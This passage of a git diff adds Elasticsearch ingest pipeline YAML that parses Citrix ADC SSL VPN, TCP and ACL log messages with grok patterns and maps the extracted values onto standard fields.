Total_bytes_send %{INT:citrix_adc.log.total_bytes_send} - Total_bytes_recv %{INT:citrix_adc.log.total_bytes_received} - Total_compressedbytes_send %{INT:citrix_adc.log.total_compressed_bytes_send} - Total_compressedbytes_recv %{INT:citrix_adc.log.total_compressed_bytes_recieved} - Compression_ratio_send %{NUMBER:citrix_adc.log.compression_ratio_send}% - Compression_ratio_recv %{NUMBER:citrix_adc.log.compression_ratio_recieved}% - LogoutMethod \"%{DATA:citrix_adc.log.logout_method}\" - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^Source 
%{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - SSLRelayAddress %{IP:citrix_adc.log.ssl_relay.address}:%{INT:citrix_adc.log.ssl_relay.port} - customername( %{WORD:citrix_adc.log.customer_name})? - username:domainname %{DATA:citrix_adc.log.username}:%{DATA:citrix_adc.log.domain_name} - applicationName %{WORD:citrix_adc.log.application_name} - startTime \"%{DATA:citrix_adc.log.start_time}\" - connectionId %{WORD:citrix_adc.log.connection_id}$' + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - SSLRelayAddress %{IP:citrix_adc.log.ssl_relay.address}:%{INT:citrix_adc.log.ssl_relay.port} - customername( %{WORD:citrix_adc.log.customer_name})? - username:domainname %{DATA:citrix_adc.log.username}:%{DATA:citrix_adc.log.domain_name} - startTime \"%{DATA:citrix_adc.log.start_time}\" - endTime \"%{DATA:citrix_adc.log.end_time}\" - Duration %{DATA:citrix_adc.log.duration} - Total_bytes_send %{NUMBER:citrix_adc.log.total_bytes_send:int} - Total_bytes_recv %{NUMBER:citrix_adc.log.total_bytes_received:int} - Total_compressedbytes_send %{NUMBER:citrix_adc.log.total_compressed_bytes_send:int} - Total_compressedbytes_recv %{NUMBER:citrix_adc.log.total_compressed_bytes_recieved:int} - Compression_ratio_send %{NUMBER:citrix_adc.log.compression_ratio_send:float}% - Compression_ratio_recv %{NUMBER:citrix_adc.log.compression_ratio_recieved:float}% - connectionId %{WORD:citrix_adc.log.connection_id}( - Total_bytes_wire_send %{NUMBER:citrix_adc.log.total_bytes_wire_send} - Total_bytes_wire_recv %{NUMBER:citrix_adc.log.total_bytes_wire_recieved})?$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Source 
%{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - Start_time \"%{DATA:citrix_adc.log.start_time}\" - End_time \"%{GREEDYDATA:citrix_adc.log.end_time}\" - Duration %{DATA:citrix_adc.log.duration} - Total_bytes_send %{NUMBER:citrix_adc.log.total_bytes_send:int} - Total_bytes_recv %{NUMBER:citrix_adc.log.total_bytes_received:int} - Total_compressedbytes_send %{NUMBER:citrix_adc.log.total_compressed_bytes_send:int} - Total_compressedbytes_recv %{NUMBER:citrix_adc.log.total_compressed_bytes_recieved:int} - Compression_ratio_send %{NUMBER:citrix_adc.log.compression_ratio_send:float}% - Compression_ratio_recv %{NUMBER:citrix_adc.log.compression_ratio_recieved:float}% - Access %{WORD:citrix_adc.log.access} - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Last_contact \"%{DATA:citrix_adc.log.last_contact}\" - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - Start_time \"%{DATA:citrix_adc.log.start_time}\" - End_time \"%{GREEDYDATA:citrix_adc.log.end_time}\" - Duration %{DATA:citrix_adc.log.duration} - Total_bytes_send %{NUMBER:citrix_adc.log.total_bytes_send:int} - Total_bytes_recv %{NUMBER:citrix_adc.log.total_bytes_received:int} - Access %{WORD:citrix_adc.log.access} - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^- Denied_by_policy \"%{DATA:citrix_adc.log.policy_violation}\"$' + - '^Vserver 
%{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - License_limit %{NUMBER:citrix_adc.log.license_limit:int}$' + - '^%{DATA}%{SPACE}:%{SPACE}%{DATA} - Client%{SPACE}IP %{IP:citrix_adc.log.client_ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Client_security_expression \"%{DATA:citrix_adc.log.client_security_expression}\" -$' + - '^User %{USER:citrix_adc.log.user}%{SPACE}:%{SPACE}- Client%{SPACE}IP %{IP:citrix_adc.log.client_ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Client%{SPACE}security%{SPACE}check%{SPACE}Passed\(%{NUMBER:citrix_adc.log.client_security_check_status:int}\)%{SPACE}on%{SPACE}the%{SPACE}client%{SPACE}machine$' + - '^Xdatalen %{NUMBER:citrix_adc.log.data_length:int} - Xdata %{GREEDYDATA:citrix_adc.log.data}$' + - '^Session%{SPACE}id %{NUMBER:citrix_adc.log.session_id:int} - User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver_ip %{IP:citrix_adc.log.vserver.ip} - Errmsg \"%{DATA:citrix_adc.log.errmsg}\"$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Browser_type \"%{DATA:citrix_adc.log.browser_type}\" - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Start_time \"%{DATA:citrix_adc.log.start_time}\" - End_time \"%{DATA:citrix_adc.log.end_time}\" - Duration %{DATA:citrix_adc.log.duration} - Http_resources_accessed %{INT:citrix_adc.log.http_resources_accessed} - Total_TCP_connections %{INT:citrix_adc.log.total_tcp_connections} - Total_policies_allowed %{INT:citrix_adc.log.total_policies_allowed} - Total_policies_denied 
%{INT:citrix_adc.log.total_policies_denied} - Total_bytes_send %{DATA:citrix_adc.log.total_bytes_send} - Total_bytes_recv %{DATA:citrix_adc.log.total_bytes_received} - Total_compressedbytes_send %{DATA:citrix_adc.log.total_compressed_bytes_send} - Total_compressedbytes_recv %{DATA:citrix_adc.log.total_compressed_bytes_recieved} - Compression_ratio_send %{NUMBER:citrix_adc.log.compression_ratio_send}% - Compression_ratio_recv %{NUMBER:citrix_adc.log.compression_ratio_recieved}% - LogoutMethod \"%{DATA:citrix_adc.log.logout_method}\" - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^Context %{USERNAME:citrix_adc.log.username}@%{IP:citrix_adc.log.client_ip} - SessionId: %{NUMBER:citrix_adc.log.session_id} - %{HOSTNAME:citrix_adc.log.hostname} User %{USERNAME:citrix_adc.log.user} : Group\(s\) %{DATA:citrix_adc.log.groups} : Vserver %{IP:citrix_adc.log.vserver.ip}:%{NUMBER:citrix_adc.log.vserver.port} - %{DATA:citrix_adc.log.timestamp} : SSO is %{WORD:citrix_adc.log.sso_status} : %{WORD:citrix_adc.log.method} %{URIPATHPARAM:citrix_adc.log.request.path} - -$' + - '^Context %{DATA:citrix_adc.log.username}@%{IP:citrix_adc.log.client_ip}%{SPACE}- SessionId: %{NUMBER:citrix_adc.log.session_id}%{SPACE}- %{HOSTNAME:citrix_adc.log.hostname} User %{DATA:citrix_adc.log.user} : Group\(s\) %{DATA:citrix_adc.log.groups} : Vserver %{IP:citrix_adc.log.vserver.ip}:%{NUMBER:citrix_adc.log.vserver.port} - %{DATA:citrix_adc.log.timestamp} %{DATA:citrix_adc.log.timezone} %{WORD:citrix_adc.log.method} %{DATA:citrix_adc.log.request.path} - -$' + - '^%{GREEDYDATA:citrix_adc.log.message}$' + ignore_failure: true + - date: + field: citrix_adc.log.timestamp + tag: date_timestamp + target_field: citrix_adc.log.timestamp + formats: + - ISO8601 + - MM/dd/yyyy:HH:mm:ss + - yyyy/MM/dd:HH:mm:ss + if: ctx.citrix_adc?.log?.timestamp != null && ctx.citrix_adc.log.timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag 
{{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.client_ip + tag: convert_client_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.client_ip != null && ctx.citrix_adc.log.client_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: client.ip + tag: set_client_ip_from_client_ip + copy_from: citrix_adc.log.client_ip + ignore_empty_value: true + - set: + field: url.domain + tag: set_url_domain_from_hostname + copy_from: citrix_adc.log.hostname + ignore_empty_value: true + - convert: + field: citrix_adc.log.total_bytes_received + tag: convert_total_bytes_received_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.bytes + tag: set_destination_bytes_from_total_bytes_received + copy_from: citrix_adc.log.total_bytes_received + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.destination?.ip != null && ctx.citrix_adc.log.destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_destination_ip + copy_from: 
citrix_adc.log.destination.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.port + tag: convert_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_port_from_destination_port + copy_from: citrix_adc.log.destination.port + ignore_empty_value: true + - set: + field: error.message + tag: set_error_message_from_errmsg + copy_from: citrix_adc.log.errmsg + ignore_empty_value: true + - date: + field: citrix_adc.log.end_time + tag: date_end_time + target_field: citrix_adc.log.end_time + formats: + - yyyy/MM/dd:HH:mm:ss + - MM/dd/yyyy:HH:mm:ss + - ISO8601 + if: ctx.citrix_adc?.log?.end_time != null && ctx.citrix_adc.log.end_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.end + tag: set_event_end_from_end_time + copy_from: citrix_adc.log.end_time + ignore_empty_value: true + - date: + field: citrix_adc.log.start_time + tag: date_start_time + target_field: citrix_adc.log.start_time + formats: + - yyyy/MM/dd:HH:mm:ss + - MM/dd/yyyy:HH:mm:ss + - ISO8601 + if: ctx.citrix_adc?.log?.start_time != null && ctx.citrix_adc.log.start_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.start + tag: set_event_start_from_start_time + copy_from: 
citrix_adc.log.start_time + ignore_empty_value: true + - set: + field: group.name + tag: set_group_name_from_groups + copy_from: citrix_adc.log.groups + ignore_empty_value: true + - convert: + field: citrix_adc.log.vserver.ip + tag: convert_vserver_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.vserver?.ip != null && ctx.citrix_adc.log.vserver.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.ip + tag: set_server_ip_from_vserver_ip + copy_from: citrix_adc.log.vserver.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.vserver.port + tag: convert_vserver_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.port + tag: set_server_port_from_vserver_port + copy_from: citrix_adc.log.vserver.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.total_bytes_send + tag: convert_total_bytes_send_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.bytes + tag: set_source_bytes_from_total_bytes_send + copy_from: citrix_adc.log.total_bytes_send + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.ip + tag: convert_source_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.source?.ip != null && 
ctx.citrix_adc.log.source.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_source_ip + copy_from: citrix_adc.log.source.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.nat.ip + tag: convert_nat_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.nat?.ip != null && ctx.citrix_adc.log.nat.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.nat.ip + tag: set_source_nat_ip_from_nat_ip + copy_from: citrix_adc.log.nat.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.port + tag: convert_source_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_source_port + copy_from: citrix_adc.log.source.port + ignore_empty_value: true + - set: + field: user.name + tag: set_user_name_from_user + copy_from: citrix_adc.log.user + ignore_empty_value: true + - convert: + field: citrix_adc.log.ssl_relay.address + tag: convert_ssl_relay_address_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.ssl_relay?.address != null && ctx.citrix_adc.log.ssl_relay.address != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag 
{{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.ssl_relay.port + tag: convert_ssl_relay_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.session_id + tag: convert_session_id_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_tcp_connections + tag: convert_total_tcp_connections_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_udp_flows + tag: convert_total_udp_flows_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_policies_allowed + tag: convert_total_policies_allowed_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline 
{{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_bytes_wire_send + tag: convert_total_bytes_wire_send_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_bytes_wire_recieved + tag: convert_total_bytes_wire_recieved_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_policies_denied + tag: convert_total_policies_denied_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_compressed_bytes_send + tag: convert_total_compressed_bytes_send_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_compressed_bytes_recieved + tag: convert_total_compressed_bytes_recieved_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag 
{{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.compression_ratio_send + tag: convert_compression_ratio_send_to_double + type: double + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.compression_ratio_recieved + tag: convert_compression_ratio_recieved_to_double + type: double + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.license_limit + tag: convert_license_limit_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.client_security_check_status + tag: convert_client_security_check_status_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.data_length + tag: convert_data_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag 
{{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: user.domain + tag: set_user_domain_from_domain_name + copy_from: citrix_adc.log.domain_name + ignore_empty_value: true +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/tcp_and_acl_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/tcp_and_acl_feature.yml new file mode 100644 index 00000000000..561b6ebb1f3 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/tcp_and_acl_feature.yml 
@@ -0,0 +1,341 @@ +--- +description: Pipeline for Citrix Native messages of TCP and ACL feature. +processors: + - grok: + description: Extract fields from message of TCP and ACL feature. + tag: grok_tcp_and_acl_feature + field: citrix.extended.message + patterns: + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - NatIP %{IP:citrix_adc.log.nat.ip}:%{INT:citrix_adc.log.nat.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - Delink Time %{DATA:citrix_adc.log.delink_time}(?: %{DATA:citrix_adc.log.delink_timezone})? - Total_bytes_send %{INT:citrix_adc.log.total_bytes_send:long} - Total_bytes_recv %{INT:citrix_adc.log.total_bytes_received:long}$' + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - NatIP %{IP:citrix_adc.log.nat.ip}:%{INT:citrix_adc.log.nat.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - Delink Time %{DATA:citrix_adc.log.delink_time}(?: %{DATA:citrix_adc.log.delink_timezone})? Total_bytes_send %{INT:citrix_adc.log.total_bytes_send:long} - Total_bytes_recv %{INT:citrix_adc.log.total_bytes_received:long}$' + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - Start Time %{DATA:citrix_adc.log.start_time}(?: %{DATA:citrix_adc.log.start_time_timezone})? - End Time %{DATA:citrix_adc.log.end_time}(?: %{DATA:citrix_adc.log.end_time_timezone})? 
- Total_bytes_send %{INT:citrix_adc.log.total_bytes_send:long} - Total_bytes_recv %{INT:citrix_adc.log.total_bytes_received:long}$' + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.original_destination.ip}:%{INT:citrix_adc.log.original_destination.port} - NatIP %{IP:citrix_adc.log.nat.ip}:%{INT:citrix_adc.log.nat.port} - Destination %{IP:citrix_adc.log.translated_destination.ip}:%{INT:citrix_adc.log.translated_destination.port} - Start Time %{DATA:citrix_adc.log.start_time}(?: %{DATA:citrix_adc.log.start_time_timezone})? - Delink Time %{DATA:citrix_adc.log.delink_time}(?: %{DATA:citrix_adc.log.delink_timezone})? - Total_bytes_send %{INT:citrix_adc.log.total_bytes_send:long} - Total_bytes_recv %{INT:citrix_adc.log.total_bytes_received:long} - Closure%{SPACE}Reason %{GREEDYDATA:citrix_adc.log.closure_reason}$' + - '^Source %{IP:citrix_adc.log.source.ip} --> Destination %{IP:citrix_adc.log.destination.ip} - Protocol %{WORD:citrix_adc.log.protocol} - Type %{INT:citrix_adc.log.type} - Code %{INT:citrix_adc.log.code} - Time%{SPACE}Stamp %{DATA:citrix_adc.log.timestamp}%{SPACE}\(ms\) - Hitcount %{INT:citrix_adc.log.hit.count:int} - Hit%{SPACE}Rule %{GREEDYDATA:citrix_adc.log.hit.rule} - Action %{WORD:citrix_adc.log.action} - Data$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - date: + field: citrix_adc.log.timestamp + tag: date_timestamp + target_field: citrix_adc.log.timestamp + formats: + - UNIX_MS + - ISO8601 + - MM/dd/yyyy:HH:mm:ss + - MMM d HH:mm:ss + - MMM d HH:mm:ss + - MMM dd HH:mm:ss + - MMMM d HH:mm:ss + - MMMM d HH:mm:ss + - MMMM dd HH:mm:ss + - yyyy MMM d HH:mm:ss + - yyyy MMM d HH:mm:ss + - yyyy MMM dd HH:mm:ss + - yyyy MMMM d HH:mm:ss + - yyyy MMMM d HH:mm:ss + - yyyy MMMM dd HH:mm:ss + if: ctx.citrix_adc?.log?.timestamp != null && ctx.citrix_adc.log.timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} 
with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_bytes_received + tag: convert_total_bytes_received_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.bytes + tag: set_destination_bytes_from_total_bytes_received + copy_from: citrix_adc.log.total_bytes_received + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.destination?.ip != null && ctx.citrix_adc.log.destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_destination_ip + copy_from: citrix_adc.log.destination.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.original_destination.ip + tag: convert_original_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.original_destination?.ip != null && ctx.citrix_adc.log.original_destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.translated_destination.ip + tag: convert_translated_destination_ip_to_ip + type: ip + ignore_missing: true + if: 
ctx.citrix_adc?.log?.translated_destination?.ip != null && ctx.citrix_adc.log.translated_destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_translated_destination_ip + copy_from: citrix_adc.log.translated_destination.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.port + tag: convert_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.original_destination.port + tag: convert_original_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.translated_destination.port + tag: convert_translated_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_port_from_destination_port + copy_from: citrix_adc.log.destination.port + ignore_empty_value: true + - 